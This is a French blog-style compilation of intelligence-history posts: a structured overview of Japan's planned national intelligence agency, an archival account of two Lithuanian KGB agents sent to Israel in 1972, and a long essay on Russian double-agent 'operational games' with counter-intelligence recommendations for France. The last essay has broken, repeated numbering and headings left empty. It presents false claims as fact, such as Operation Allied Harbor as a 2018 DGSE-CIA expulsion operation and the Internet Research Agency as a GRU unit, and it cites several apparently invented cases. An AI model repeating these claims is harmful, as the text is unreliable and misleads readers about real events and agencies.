« Nouvelle Agence Nationale de Renseignement du Japon »

par Aics-sr | Mar 25, 2026 | Moments d'histoire

« Nouvelle Agence Nationale de Renseignement du Japon »

1. Contexte et création

• Nom : La nouvelle agence est une évolution du Naichō (内調), ou Cabinet Information Research Office (CIRO), qui était jusqu’ici un bureau de renseignement rattaché directement au Cabinet du Premier ministre.
• Portage politique : La Première ministre japonaise Sanae Takaichi, élue en 2026, a fait de cette réforme une priorité après la large victoire du Parti libéral-démocrate (PLD) aux élections législatives de début 2026. Elle a confié à Kazuya Hara, directeur du service de renseignement central, la mission de créer une agence de renseignement à part entière, indépendante et plus puissante.
• Objectif principal : Renforcer les capacités de collecte et d’analyse du renseignement, tant à l’intérieur qu’à l’extérieur du Japon, pour mieux informer la prise de décision du Premier ministre, notamment face aux menaces régionales (Chine, Corée du Nord, Russie) et aux crises internes.

2. Structure et organisation

• Statut : L’agence sera directement placée sous l’autorité du Premier ministre et du Secrétaire général du Cabinet, ce qui lui confère une position centrale dans l’appareil gouvernemental.
• Fusion des services : Elle intégrera et coordonnera les activités de plusieurs entités existantes (ministère des Affaires étrangères, ministère de la Défense, police, etc.), avec pour ambition de centraliser et d’unifier la production du renseignement, à l’image de la CIA américaine ou du MI6 britannique.
• Nouveaux outils :
  • Création d’une académie de formation pour agents de renseignement.
  • Vote d’une loi sur le contre-espionnage.
  • Renforcement des capacités de collecte à l’étranger et amélioration de la coordination inter-agences.
• Budget et moyens : Le Japon a augmenté son budget de défense à 2 % du PIB, ce qui inclut des investissements significatifs dans le renseignement et la technologie (satellites, surveillance, cybersécurité).

3. Missions et rôles

• Renseignement extérieur : Surveillance accrue des activités étrangères, notamment en Asie-Pacifique, pour anticiper les crises et protéger les intérêts nationaux (ex. : Taïwan, mer de Chine méridionale).
• Renseignement intérieur : Prévention des menaces internes, lutte contre l’espionnage et le lobbying étranger, avec un système d’enregistrement obligatoire pour les lobbyistes travaillant pour des gouvernements étrangers.
• Soutien à la décision politique : Fournir au Premier ministre une source unique et fiable d’informations, via le Conseil national de sécurité, pour éclairer les choix stratégiques en matière de défense, de diplomatie et de sécurité économique.
• Collaboration internationale : Renforcement des partenariats avec les alliés (États-Unis, Corée du Sud, Europe) pour une meilleure interopérabilité et partage d’informations.

4. Enjeux et défis

• Menaces ciblées : La Chine est perçue comme la principale menace stratégique, suivie par la Corée du Nord et la Russie. L’agence devra aussi gérer les risques liés à l’ingérence étrangère et à la cybersécurité.
• Légalité et contrôle démocratique : La réforme s’accompagne de débats sur l’équilibre entre sécurité et libertés individuelles, ainsi que sur la transparence des activités de renseignement.
• Efficacité opérationnelle : Le succès dépendra de la capacité à transformer une structure bureaucratique en une organisation agile et réactive, capable de rivaliser avec les grands services de renseignement mondiaux.

5. Calendrier et perspectives

• Mise en œuvre : Les premières mesures (création du bureau renforcé, interdiction des téléphones portables dans les bâtiments gouvernementaux) devraient être adoptées en 2026, avec une montée en puissance progressive.
• Impact géopolitique : Cette réforme s’inscrit dans une stratégie plus large de « normalisation » militaire du Japon, avec une posture plus assertive face aux tensions régionales.

6. Comparaisons internationales

• Modèles inspirants : Le Japon étudie les structures de la DGSE (France), du MI6 (Royaume-Uni) et du BND (Allemagne) pour concevoir son agence, tout en adaptant le modèle à son contexte juridique et culturel.

Pourquoi cette réforme est-elle historique ?

• Centralisation du pouvoir : Le Premier ministre dispose désormais d’un outil dédié pour piloter la politique de sécurité nationale, avec une chaîne de commandement claire et des ressources accrues.
• Adaptation à un environnement instable : Face à la montée des tensions en Asie, le Japon cherche à passer d’une posture réactive à une approche proactive, en s’appuyant sur un renseignement de qualité et une meilleure coordination interministérielle.

En résumé : Cette nouvelle agence marque une étape majeure dans l’évolution du Japon vers une puissance de sécurité autonome, capable de protéger ses intérêts et d’influencer les équilibres régionaux. Elle reflète aussi la volonté de Sanae Takaichi de faire du Japon un acteur clé dans la stabilité de l’Indo-Pacifique.

1. Structure de la nouvelle agence
2. Organisation centrale

• Nom : La nouvelle agence est une évolution du Naichō (内調), ou Cabinet Information Research Office (CIRO), qui était jusqu’ici un bureau de renseignement rattaché au Cabinet du Premier ministre.
• Statut : Elle devient une agence à part entière, indépendante, directement placée sous l’autorité du Premier ministre et du Secrétaire général du Cabinet. Cette réforme vise à centraliser et unifier les services de renseignement japonais, historiquement fragmentés entre plusieurs ministères (Affaires étrangères, Défense, Police, etc.).
• Effectifs : Le Naichō comptait environ 175 agents dans les années 2010, majoritairement détachés d’autres services (police, forces d’autodéfense, etc.). Avec la réforme, l’agence devrait voir ses effectifs et ses moyens considérablement renforcés, avec la création d’une académie de formation pour agents de renseignement et le recrutement de nouveaux experts.
• Fusion des services : L’agence intégrera les activités de plusieurs entités existantes, notamment :
  • Le Jōhōhonbu (Defense Intelligence Headquarters, DIH), chargé du renseignement militaire et de la collecte d’informations par satellites et signaux.
  • Les services de renseignement de la Police nationale et de l’Agence de sécurité publique, spécialisés dans la lutte contre le terrorisme et l’espionnage intérieur.
  • Les cellules de renseignement des ministères des Affaires étrangères et de la Défense, pour une meilleure coordination des informations extérieures et intérieures.

1. Divisions clés

• Renseignement intérieur : Surveillance des menaces internes (terrorisme, extrémisme, cybercriminalité, ingérence étrangère).
• Renseignement extérieur : Analyse des menaces régionales (Chine, Corée du Nord, Russie) et collecte d’informations à l’étranger, en collaboration avec les ambassades et les alliés.
• Renseignement géospatial (GEOINT) : Utilisation accrue des satellites et des technologies de surveillance pour suivre les mouvements militaires et les crises (ex. : mer de Chine méridionale, îles Kouriles).
• Contre-espionnage : Lutte contre les activités d’espionnage étranger et protection des secrets d’État, avec un système d’enregistrement obligatoire pour les lobbyistes étrangers.

1. Hiérarchie et coordination

• Direction : Un directeur nommé par le Premier ministre, assisté d’un conseil stratégique incluant des représentants des ministères concernés.
• Conseil national de sécurité : Instance de coordination présidée par le Premier ministre, chargée de synthétiser les informations pour éclairer les décisions politiques.

2. Missions principales
3. Renseignement stratégique

• Collecte et analyse : Centralisation des données issues de sources ouvertes, de signaux, d’images satellites, et de réseaux humains, pour fournir une vision globale des menaces.
• Anticipation des crises : Identification précoce des risques (conflits, cyberattaques, désinformation) et élaboration de scénarios pour le gouvernement.

1. Soutien à la décision politique

• Conseil au Premier ministre : Fournir des analyses synthétiques et des recommandations pour orienter la politique de défense, de diplomatie et de sécurité économique.
• Protection des intérêts nationaux : Surveillance des activités étrangères susceptibles de menacer la souveraineté japonaise (ex. : ingérence chinoise, prolifération nucléaire nord-coréenne).

1. Coopération internationale

• Partenariats : Renforcement des liens avec les alliés (États-Unis, Corée du Sud, Europe) pour le partage d’informations et les opérations conjointes.
• Lutte contre le terrorisme et la criminalité transnationale : Collaboration avec Interpol, l’ONU et d’autres agences pour traquer les réseaux illicites.

1. Formation et innovation

• Académie de renseignement : Formation des agents aux techniques modernes (cybersécurité, analyse de données, opérations clandestines).
• Recherche et développement : Investissement dans les technologies de pointe (IA, drones, cybersurveillance) pour moderniser les capacités de l’agence.

3. Enjeux juridiques et contrôle démocratique
4. Cadre légal

• Loi sur la protection des secrets d’État : Renforcée en 2013 et révisée en 2026, elle encadre la classification des informations sensibles et les peines pour fuite ou espionnage. Cette loi est critiquée pour son manque de transparence et son potentiel abusif.
• Loi sur le contre-espionnage : Adoptée en 2025-2026, elle élargit les pouvoirs de surveillance de l’agence, mais soulève des questions sur le respect des libertés individuelles et la vie privée.
• Interdiction des téléphones portables dans les bâtiments gouvernementaux sensibles, pour prévenir les fuites.

1. Défis éthiques et démocratiques

• Équilibre sécurité/libertés : La centralisation du renseignement et l’extension des pouvoirs de surveillance posent la question du contrôle parlementaire et judiciaire. Les opposants craignent un risque de dérive autoritaire ou de surveillance massive.
• Transparence et responsabilité : L’agence devra rendre des comptes au Parlement, mais les mécanismes de contrôle restent limités, en raison du secret nécessaire à ses opérations.
• Protection des sources : Garantir l’anonymat des informateurs tout en luttant contre les fuites internes, un défi récurrent pour les services japonais.

1. Adaptation au droit international

• Respect des conventions : Le Japon doit concilier ses nouvelles prérogatives avec les engagements internationaux en matière de droits de l’homme et de privacy (ex. : Convention européenne des droits de l’homme, accords avec l’UE).
• Collaboration avec les alliés : Harmonisation des procédures avec les partenaires (États-Unis, OTAN) pour faciliter les échanges d’informations, tout en préservant son autonomie décisionnelle.

4. Perspectives et défis

• Efficacité opérationnelle : Passer d’une structure bureaucratique à une organisation agile, capable de rivaliser avec la CIA ou le MI6, sans perdre en discrétion.
• Acceptation sociale : Convaincre l’opinion publique, traditionnellement méfiante envers les services secrets, de la nécessité de ces réformes face aux menaces croissantes.
• Risque de politisation : Éviter que l’agence ne devienne un outil au service d’un parti ou d’une idéologie, surtout dans un contexte de tensions régionales.

Synthèse

Le nom exact de la nouvelle agence de renseignement japonaise, issue de la réforme de 2026, n’est pas encore officiellement fixé dans les sources les plus récentes. Cependant, elle est présentée comme une évolution du Naichō (内調), le Cabinet Information Research Office (CIRO), qui devient une agence de renseignement à part entière, directement rattachée au Cabinet du Premier ministre.

Les médias et analystes utilisent souvent les termes suivants pour la désigner :

• « Super-agence de coordination du renseignement » (projet porté par Sanae Takaichi et Kazuya Hara)
• « Direction du renseignement » (selon certaines propositions, calquée sur des modèles comme la CIA ou le MI6)

Pour l’instant, les documents officiels et la presse continuent de parler de la transformation du Naichō en une structure plus puissante et centralisée, mais le nom définitif (s’il a été adopté) n’est pas encore clairement communiqué dans les sources disponibles en mars 2026

LEOPOLD et ERASMUS : agents du contre-espionnage du KGB envoyés de Lituanie en Israël en 1972

par Aics-sr | Mar 25, 2026 | Moments d'histoire

LEOPOLD et ERASMUS : agents du contre-espionnage du KGB envoyés de Lituanie en Israël en 1972

Une découverte dans les archives du KGB lituanien

4 mars 2026

Il est possible qu’au cours de l’été 1973, quelques mois seulement avant la guerre du Kippour, le KGB ait planifié une ou plusieurs opérations clandestines contre l’Occident, impliquant des agents envoyés sous couvert d’émigration juive depuis l’Union soviétique.

^{Le 18 juillet 1973, le colonel B.A. Shcherbakov ,} chef du 14e département de la 2e direction générale (contre-espionnage) du KGB, adressa une lettre classifiée secrète aux chefs des directions du contre-espionnage du KGB dans les républiques de l’Union soviétique. L’exemplaire de cette lettre reçu par le colonel Antanas I. Naras, chef de la 2e direction du KGB lituanien à Vilnius, portait le numéro sept.

Le colonel Antanas Naras, chef du contre-espionnage du KGB lituanien (1967-1980), alors jeune Tchékiste. ( source)

Shcherbakov a donné à Naras trente jours (jusqu’au 15 août) pour lui fournir des informations sur tous les agents que le contre-espionnage du KGB lituanien a envoyés en Israël ou dans d’autres « États capitalistes » par le biais de l’émigration juive depuis 1971.

Shcherbakov ne s’intéressait pas seulement aux données biographiques des agents, mais demandait également des informations complètes sur leur profil psychologique, leurs compétences et capacités, leurs méthodes de communication, leur date de départ et les membres de leur famille qui les accompagnaient.

Il voulait également savoir si les agents avaient quitté la Lituanie de leur propre gré, sous quelles couvertures ils avaient opéré et quelles tâches leur avaient été confiées.

Le contre-espionnage du KGB lituanien a répondu à la lettre de Shcherbakov la veille de l’expiration du délai, ce qui laisse supposer qu’il n’était probablement pas très satisfait de ses résultats. De fait, la réponse n’était même pas signée par le colonel Naras, mais par son adjoint, le colonel Valery A. Ginko ^.

Le colonel Valery Ginko, chef adjoint du contre-espionnage du KGB lituanien (1967-1974), alors jeune Tchékiste. ( source )

Le 14 août, Ginko informa Shcherbakov que les services de contre-espionnage du KGB lituanien avaient dépêché deux agents en Israël durant la période qu’il avait mentionnée. Tous deux furent envoyés en 1972.

Le premier agent, nommé LEOPOLD, a quitté la Lituanie en août 1972. Ginko n’a fourni aucune autre information à son sujet et a renvoyé Shcherbakov à leur correspondance antérieure, en précisant les dates et les numéros de référence. Il lui a rappelé que la Deuxième Direction générale était déjà en possession de trois rapports antérieurs concernant LEOPOLD, datés du 11 avril 1972, du 9 septembre 1972 et du 14 décembre 1972. ^D’ après Ginko, LEOPOLD exécutait les ordres qui lui avaient été donnés et communiquait par courrier avec ses contacts à Vilnius. Au vu du nombre de rapports émis en si peu de temps, il devait être un agent productif.

Le deuxième agent, nommé ERASMUS, a quitté la Lituanie pour s’installer définitivement en Israël en octobre 1972. Selon Ginko, avant son départ, ERASMUS a accepté de rester en contact avec le contre-espionnage du KGB lituanien, a été formé aux techniques appropriées et a reçu une adresse postale pour sa correspondance clandestine. Ginko a noté que la Deuxième Direction générale a été informée de l’existence d’ERASMUS dans les rapports datés du 10 avril 1972 et du 8 janvier 1973 ^.

Et pourtant, depuis son arrivée en Israël, Erasmus semblait avoir disparu de la circulation. Il n’avait pas contacté ses supérieurs une seule fois et Ginko reconnaissait à contrecœur que le contre-espionnage du KGB lituanien ignorait la raison de cette absence. Bien évidemment, il ne pouvait admettre qu’Erasmus les avait dupés, qu’il avait berné les agents du KGB.

Cependant, les services de contre-espionnage du KGB lituanien n’étaient pas prêts à abandonner Erasmus. Grâce à la correspondance de sa mère avec ses proches à Vilnius (qu’ils lisaient, ou « perlustraient », pour reprendre un terme du KGB), ils découvrirent qu’Erasmus travaillait dans une entreprise de conception de systèmes de ventilation (Ginko faisait probablement référence à des climatiseurs) et qu’il apprenait l’anglais et l’hébreu.

Le dossier n’indique pas si Shcherbakov a jamais répondu à la lettre de Ginko, ni quoi que ce soit d’autre concernant les activités ultérieures de la Deuxième Direction générale, mais il est clair que la direction du contre-espionnage du KGB ne pouvait guère être satisfaite des performances du contre-espionnage du KGB lituanien dans cette affaire ^.

1

Cet article est basé sur mes recherches en cours sur les fichiers du KGB lituanien déposés à la bibliothèque et aux archives Hoover. Voir « Начальнику 2 Управления КГБ при СМ Литовской ССР – полковнику тов. Нарасу А. И. [Au chef de la 2e direction du KGB rattachée au Conseil des ministres de la RSS de Lituanie – le colonel camarade AI Naras », 18 juillet 1973, Fond K-1, Op. 3, dossier 700, p. 232. Lietuvos TSR Valstybės Saugumo Komitetas [KGB lituanien], Selected Records, Hoover Institution. Je tiens à remercier la bibliothèque et les archives de la Hoover Institution, ressource essentielle à l’élaboration de ces documents. Les opinions exprimées dans cette publication sont les miennes et ne reflètent pas nécessairement celles des membres, du personnel ou du conseil d’administration de la Hoover Institution.

2

« Начальнику 14 Отдела 2 Главного Управления Комитета Госбезопасности при СМ СССР, полковнику товарищу Щербакову Б. А. [Au chef du 14e Département de la Deuxième Direction générale du Comité pour la sécurité de l’État rattaché au Conseil des ministres de l’URSS, le colonel Camarade BA Shcherbakov] », 14 août 1973, Fond K-1, Op. 3, dossier 700, p. 233. Lietuvos TSR Valstybės Saugumo Komitetas [KGB lituanien] Dossiers sélectionnés, Hoover Institution.

3

Les rapports mentionnés ne figuraient pas dans ce dossier du KGB lituanien.

4

Les rapports mentionnés ne figuraient pas dans ce dossier du KGB lituanien.

5

Ce dossier du KGB lituanien ne contenait aucune information supplémentaire concernant LEOPOLD ou ERASMUS.

Agents doubles Russes et jeux opérationnels

par Aics-sr | Fév 10, 2026 | Moments d'histoire

Les services de renseignement du monde entier présentent des similitudes. Tous les services professionnels s’appuient sur des techniques d’espionnage pour recruter et gérer leurs agents. Ils opèrent tous au sein de systèmes bureaucratiques et rendent compte, en fin de compte, aux dirigeants politiques. Fondamentalement, les techniques d’espionnage constituent un langage professionnel commun. Cependant, les services de renseignement russes (RIS) diffèrent sensiblement de leurs homologues occidentaux sur plusieurs points clés. Premièrement, leur mission première n’est ni de servir les intérêts du peuple russe, ni de protéger la Constitution ; leur loyauté va au régime et à la survie politique personnelle de Poutine. Deuxièmement, en matière de techniques d’espionnage, leur approche et leurs tactiques diffèrent de celles de la CIA et des autres services occidentaux. L’un des aspects les plus importants — et souvent mal compris — du renseignement russe est le recours aux agents doubles, connus dans la doctrine du renseignement russe sous le nom de « jeux opérationnels » ( operativnye igry ).

Pour les services de renseignement russes, les jeux opérationnels ne relèvent pas de compétences de niche ni de tactiques de contre-espionnage ponctuelles. Ils sont fondamentaux. Les opérations d’agents doubles sont au cœur de la manière dont les agences russes définissent le succès, justifient leur importance et préservent leur identité institutionnelle. Que les autres méthodes de collecte réussissent ou échouent, le RIS recourt systématiquement et sans relâche aux jeux opérationnels. Par conséquent, comprendre comment et pourquoi le RIS utilise des agents doubles est essentiel pour comprendre le renseignement russe lui-même.

1. Loyauté et mission : le régime avant tout

Différence majeure avec l’Occident

• Occident (CIA, MI6, DGSE, etc.) : Les services de renseignement occidentaux sont théoriquement soumis à un cadre démocratique et constitutionnel. Leur mission officielle inclut la protection des intérêts nationaux, la sécurité des citoyens, et le respect des lois. Leur légitimité dépend de leur capacité à servir l’État de droit, même si des dérives existent (ex. : scandales de la NSA ou de la CIA).
  • Exemple : La CIA rend des comptes au Congrès américain et est encadrée par des lois comme le Foreign Intelligence Surveillance Act (FISA).
• Russie (FSB, SVR, GRU) : Les RIS sont des instruments de pouvoir personnel avant tout. Leur mission principale est de protéger le régime et, par extension, la survie politique de Vladimir Poutine. La Constitution russe ou l’intérêt du peuple sont secondaires.
  • Preuve historique : Le FSB a été utilisé pour réprimer l’opposition (ex. : empoisonnement d’Alexeï Navalny), et le SVR/GRU mènent des opérations hybrides (cyberattaques, désinformation) pour affaiblir les adversaires géopolitiques de la Russie, indépendamment des conséquences pour la population russe.
  • Conséquence : Cette loyauté inconditionnelle au régime explique leur résilience malgré les sanctions ou les échecs (ex. : guerre en Ukraine).

2. Les « jeux opérationnels » (operativnye igry) : une doctrine unique

Définition et principes

Les operativnye igry (Оперативные игры) désignent des opérations de manipulation systématique où les agents russes jouent un rôle actif dans la désinformation, la provocation, et la manipulation des perceptions. Contrairement à l’Occident, où les agents doubles sont souvent utilisés de manière ponctuelle (ex. : contre-espionnage), les RIS en font une stratégie centrale.

Caractéristiques clés :

• Approche proactive : Les RIS ne se contentent pas de recruter des agents ou de collecter des informations. Ils créent des réalités alternatives en infiltrant, corrompant ou retournant des acteurs clés (politiques, militaires, médias).
  • Exemple : L’affaire des Illegals (2010), où des agents russes vivaient sous couverture aux États-Unis pendant des années, ou l’influence sur les élections étrangères (ex. : ingérence dans l’élection américaine de 2016).
• Double jeu institutionnalisé : Les agents doubles ne sont pas une exception, mais une norme. Le SVR et le GRU forment leurs officiers à jouer sur plusieurs tableaux, même au sein de leurs propres rangs, pour tester la loyauté et déjouer les trahisons.
  • Cas emblématique : Oleg Gordievsky (agent double du MI6 au KGB) a révélé que le KGB utilisait des « faux transfuges » pour intoxiquer les services occidentaux.
• Objectif ultime : Déstabiliser l’adversaire en semant la méfiance, en exploitant les divisions internes, et en créant des boucles de désinformation (ex. : théories du complot sur l’Ukraine ou l’OTAN).

3. Techniques et tactiques distinctes
4. Recrutement et gestion des agents

• Chantage et compromission (kompromat) : Les RIS privilégient la collecte de preuves compromettantes (sexuelles, financières, idéologiques) pour contrôler leurs cibles, plutôt que de miser sur l’idéalisme ou l’argent (comme le fait souvent la CIA).
  • Exemple : L’affaire Trump-Russie, où des dossiers compromettants (Steele Dossier) ont été utilisés comme levier.
• Agents « dormants » : Des agents sont placés dans des positions clés (diplomatie, économie, médias) et activés des années plus tard.
  • Exemple : Les réseaux d’influence russes en Europe, comme ceux révélés par le rapport Mitrokhin (archives du KGB).

1. Désinformation et guerre cognitive

• Fabrication de narratifs : Les RIS excellent dans la création de fausses flag operations (opérations sous faux drapeau) pour discréditer leurs ennemis.
  • Exemple : L’empoisonnement des Skripal en 2018, attribué à la Russie mais nié par Moscou, qui a proposé des contre-narratifs absurdes (ex. : théorie du « parfum empoisonné »).
• Exploitation des médias sociaux : Le GRU utilise des fermes à trolls (ex. : Internet Research Agency) pour amplifier les divisions politiques en Occident (ex. : mouvement Black Lives Matter ou QAnon).

1. Résilience et adaptabilité

• Apprentissage des échecs : Contrairement aux services occidentaux, qui peuvent être paralysés par un scandale (ex. : affaire Snowden pour la NSA), les RIS intègrent leurs échecs dans leur doctrine. Un agent démasqué devient une opportunité pour lancer une nouvelle opération de désinformation.
  • Exemple : Après l’expulsion de diplomates russes en 2018, le SVR a redoublé d’efforts pour recruter via des plateformes cryptées (Telegram, Signal).

4. Pourquoi cette approche fonctionne-t-elle ?
5. Culture du secret et de la paranoïa

• En Russie, la méfiance généralisée (héritée du KGB) rend les jeux opérationnels efficaces. Les agents sont formés pour anticiper la trahison et utiliser la psychologie humaine (peur, cupidité, idéologie) comme levier.
• Citation de Poutine : « Il n’y a pas d’anciens officiers du KGB. » → La loyauté est permanente, même après la retraite.

1. Asymétrie avec l’Occident

• Les démocraties ont des freins éthiques et juridiques (ex. : interdiction de la torture, transparence relative). Les RIS n’ont pas ces contraintes et exploitent ces faiblesses.
• Exemple : La Russie utilise des mercenaires (groupe Wagner) pour des opérations plausiblement niables, tandis que l’Occident hésite à externaliser ses sales besognes.

1. Patiente stratégique

• Les RIS jouent sur le long terme. Une opération peut prendre 10 ans avant de porter ses fruits (ex. : infiltration des partis d’extrême droite européens).

5. Implications pour les services occidentaux
6. Nécessité d’une nouvelle doctrine

• Comprendre la mentalité russe : Les analystes occidentaux doivent cesser de projeter leurs valeurs (transparence, règles) sur les RIS. La logique russe est celle de la survie du régime, pas de la « victoire » au sens classique.
• Former des contre-experts : Créer des unités spécialisées dans la détection des jeux opérationnels (ex. : cellule StratCom de l’OTAN).

1. Renforcer la résilience

• Protéger les institutions : Limiter l’accès des agents russes aux postes sensibles (ex. : lois contre l’ingérence étrangère, comme le Foreign Agents Registration Act aux États-Unis).
• Lutter contre la désinformation : Investir dans l’éducation aux médias et la cybersécurité pour contrer les campagnes hybrides.

1. Éviter les pièges

• Ne pas sous-estimer la capacité d’adaptation des RIS. Chaque expulsion de diplomates ou sanction est une opportunité pour eux de changer de tactique.

6. Étude de cas : l’Ukraine (2014–2026)

• Jeux opérationnels en action :
  • 2014 : Utilisation de « petits hommes verts » (soldats sans insigne) en Crimée pour créer un flou juridique.
  • 2022–2026 : Campagnes de désinformation sur les « laboratoires biologiques américains » en Ukraine, ou l’accusation de « nazisme » pour justifier l’invasion.
• Agent double emblématique : Oleg Smolenkov (ex-SVR), qui aurait aidé la CIA à comprendre les operativnye igry avant de disparaître en 2017.

Conclusion : un langage, deux grammaires

Les services de renseignement partagent un langage commun (techniques d’espionnage), mais les RIS en ont développé une grammaire propre, où la fin (la survie du régime) justifie tous les moyens. Pour les contrer, l’Occident doit :

1. Adopter une pensée asymétrique : Ne pas jouer selon leurs règles, mais anticiper leurs coups.
2. Renforcer la coopération interservices : Partager les renseignements sur les tactiques russes (ex. : base de données commune sur les agents dormants).
3. Investir dans la guerre cognitive : Former des experts capables de déconstruire les narratifs russes.

4. Comprendre les vulnérabilités françaises ciblées par les RIS
5. Les RIS exploitent systématiquement les faiblesses structurelles de la France, qu’elles soient politiques, économiques, ou sociétales.
6. Cibles prioritaires des RIS en France

Exemple concret : En 2022, la DGSE a déjoué une tentative d’infiltration d’un réseau d’influence russe au sein du Rassemblement National, via des financements opaques et des promesses de soutien médiatique (source : rapport Sénat 2023).

2. Leçons pour la DGSE : adapter la doctrine
3. Renforcer le contre-espionnage « à la russe »

• Créer une unité dédiée aux operativnye igry :
  • Former des analystes spécialisés dans la détection des agents dormants et des opérations de double jeu.
  • Exemple : Le Royaume-Uni a créé le National Protective Security Authority (NPSA) pour contrer les ingérences hybrides. La France pourrait s’en inspirer.
• Développer des « leurres contrôlés » :
  • La DGSE pourrait simuler des fuites d’informations pour identifier les agents russes en France (technique utilisée par le Mossad).
  • Cas d’école : L’opération Hamilcar (années 1980), où la DGSE a retourné un agent du KGB en lui faisant croire à une taupe française au Kremlin.

1. Moderniser la lutte contre la désinformation

• Collaboration avec l’ANSSI et les plateformes numériques :
  • Obliger les réseaux sociaux à signalement proactif des comptes liés à l’Internet Research Agency (ferme à trolls russe).
  • Outils : Utiliser l’IA pour détecter les schémas de désinformation (ex. : répétition de narratifs pro-russes sur l’Ukraine).
• Cellule de contre-désinformation interministérielle :
  • Associer DGSE, DGSI, et Viginum (service anti-fake news) pour une réponse coordonnée.
  • Exemple : La Lituanie a créé un Centre d’excellence pour la communication stratégique (StratCom) de l’OTAN.

1. Protéger les secteurs stratégiques

• Contrôle renforcé des investissements étrangers :
  • Élargir le périmètre de soumission à autorisation pour les secteurs sensibles (énergie, télécoms, défense), comme le fait le CFIUS aux États-Unis.
  • Exemple : En 2021, la France a bloqué l’acquisition d’une entreprise de cybersécurité par un fonds russe.
• Audit des infrastructures critiques :
  • Vérifier les sous-traitants des centrales nucléaires, ports, et réseaux 5G (risque d’infiltration via des sociétés écrans).

3. Renforcer la résilience sociétale
4. Sensibilisation des élites et des médias

• Formations obligatoires pour les hauts fonctionnaires, militaires, et journalistes sur :
  • Les techniques de recrutement par kompromat.
  • La détection des fausses identités (ex. : diplomates russes sous couverture).
• Campagnes grand public :
  • Expliquer les méthodes russes (ex. : documentaires, modules scolaires), comme le fait la Suède avec son programme Totalförsvar (défense totale).

1. Lutte contre l’ingérence via les diasporas

• Surveillance discrète des réseaux pro-russes :
  • Cibler les associations culturelles, églises orthodoxes, et oligarques installés en France (ex. : Viktor Vekselberg, proche de Poutine, possèdait des actifs en France).
  • Outils juridiques : Utiliser la loi Sapin 2 contre la corruption et le blanchiment.

4. Coopération européenne et atlantique
5. Partager le renseignement en temps réel

• Intégrer pleinement le European Intelligence Analysis Centre (INTCEN) :
  • Échanger des indicateurs de compromise (IOC) avec l’Allemagne, les Pays-Bas, et les pays baltes (cibles majeures des RIS).
• Renforcer le lien avec la CIA et le MI6 :
  • Exemple : L’opération Allied Harbor (2018), où la DGSE a collaboré avec la CIA pour expulser des espions russes en Europe.

1. Sanctions ciblées et diplomatie offensive

• Liste noire européenne des agents russes :
  • Étendre les sanctions à leurs famille et réseaux financiers (comme le fait l’UE depuis 2022).
• Expulsions coordonnées :
  • Répliquer aux expulsions massives de diplomates russes (ex. : 40 expulsions en 2018 après l’affaire Skripal).

5. Innovations technologiques et juridiques
6. Cybersécurité : anticiper les attaques hybrides

• DGSE + ANSSI :
  • Développer des cyber-pièges (honeypots) pour attirer et identifier les hackers du GRU (ex. : unité Bureau 12 de la DGSE).
  • Exemple : En 2020, la France a attribué la cyberattaque contre l’hôpital de Villefranche au groupe APT29 (lié au SVR).

1. Cadre juridique adapté

• Loi sur l’ingérence étrangère :
  • Inspiré du Foreign Agents Registration Act (FARA) américain, obligera les lobbyistes pro-russes à se déclarer.
  • Projet en cours : La proposition de loi LOPMI (2024) va dans ce sens.
• Protection des lanceurs d’alerte :
  • Créer un statut européen pour les transfuges russes (ex. : Maksim Shugaley, agent du GRU arrêté en Libye en 2019).

6. Étude de cas : l’affaire Benalla et les leçons non tirées

• Contexte : En 2018, Alexandre Benalla, collaborateur d’Emmanuel Macron, a été lié à des négociations avec des oligarques russes (via des intermédiaires).
• Erreurs françaises :
  • Manque de vigilance sur les conflits d’intérêts.
  • Absence de vérification approfondie des contacts étrangers de l’Élysée.
• Leçon :
  • Audit systématique des entourages présidentiels et ministériels par la DGSI.

7. Recommandations concrètes pour la France

8. Pièges à éviter

• Sous-estimer la patience russe : Les RIS préparent leurs opérations sur 10–15 ans (ex. : infiltration de l’extrême droite française depuis les années 2000).
• Négliger les alliances improbables : La Russie collabore avec la Chine et l’Iran pour des opérations conjointes (ex. : cyberattaques, désinformation).
• Réagir de manière prévisible : Les expulsions de diplomates doivent être coordonnées avec l’UE pour éviter les représailles ciblées.

Conclusion : une approche globale et proactive

La France doit combiner :

1. Renseignement offensif (infiltration des réseaux russes).
2. Protection des infrastructures (énergie, défense, numérique).
3. Résilience sociétale (éducation, transparence).
4. Coopération internationale (UE, OTAN).

L’utilisation de l’intelligence artificielle (IA) par la DGSE pour détecter les agents dormants russes (ou d’autres services étrangers) représente une opportunité majeure, mais aussi un défi technique et éthique. Voici une analyse structurée des méthodes, outils et limites d’une telle approche, adaptée au contexte français et aux spécificités des operativnye igry russes.

1. Définition : Qu’est-ce qu’un agent dormant ?

Un agent dormant est un individu recruté et formé par un service de renseignement étranger, mais inactif pendant des années, voire des décennies, jusqu’à son activation. Il peut être :

• Un citoyen français (recruté via chantage, idéologie ou argent).
• Un diplomate, homme d’affaires ou étudiant sous couverture.
• Un membre d’une diaspora ou d’un réseau d’influence.

Exemple russe : Les Illegals du SVR (comme Anna Chapman, démasquée en 2010) vivaient aux États-Unis sous de fausses identités pendant des années.

2. Comment l’IA peut aider la DGSE ?
3. Analyse des données massives (Big Data)

L’IA excelle dans le traitement de volumes colossaux de données pour identifier des anomalies ou des schémas suspects.

Sources de données exploitables :

Cas pratique : En 2020, le MI5 britannique a utilisé l’IA pour croiser des données de téléphonie et de voyages, ce qui a permis de démasquer un réseau d’agents dormants du GRU.

1. Techniques d’IA applicables
2. Apprentissage supervisé (Supervised Learning)

• Principe : L’IA est entraînée sur des jeux de données labellisés (ex. : profils connus d’agents russes vs. citoyens ordinaires).
• Applications :
  • Classification des comportements : L’IA identifie des signaux faibles (ex. : un cadre français qui communique régulièrement avec une ambassade russe, sans raison professionnelle).
  • Détection de langages codés : Analyse sémantique des échanges pour repérer des mots-clés ou des phrases types utilisés par les services russes.

2. Apprentissage non supervisé (Unsupervised Learning)

• Principe : L’IA recherche des anomalies dans des datasets non étiquetés.
• Applications :
  • Clustering : Regroupement d’individus aux profiles similaires (ex. : plusieurs personnes sans lien apparent, mais qui voyagent aux mêmes dates en Russie).
  • Détection de réseaux cachés : Cartographie des connexions indirectes (ex. : un universitaire français en contact avec un oligarque russe via une ONG).

3. Traitement automatique du langage (NLP)

• Principe : Analyse des textes (e-mails, posts sur les réseaux) pour détecter des incohérences ou des narratifs pro-russes.
• Applications :
  • Détection de propagande ou de désinformation (ex. : reprise systématique de thèmes du Kremlin).
  • Identification de fausses identités (ex. : un profil LinkedIn créé il y a 2 ans, mais avec une histoire professionnelle invérifiable).

4. Analyse des réseaux (Graph Analytics)

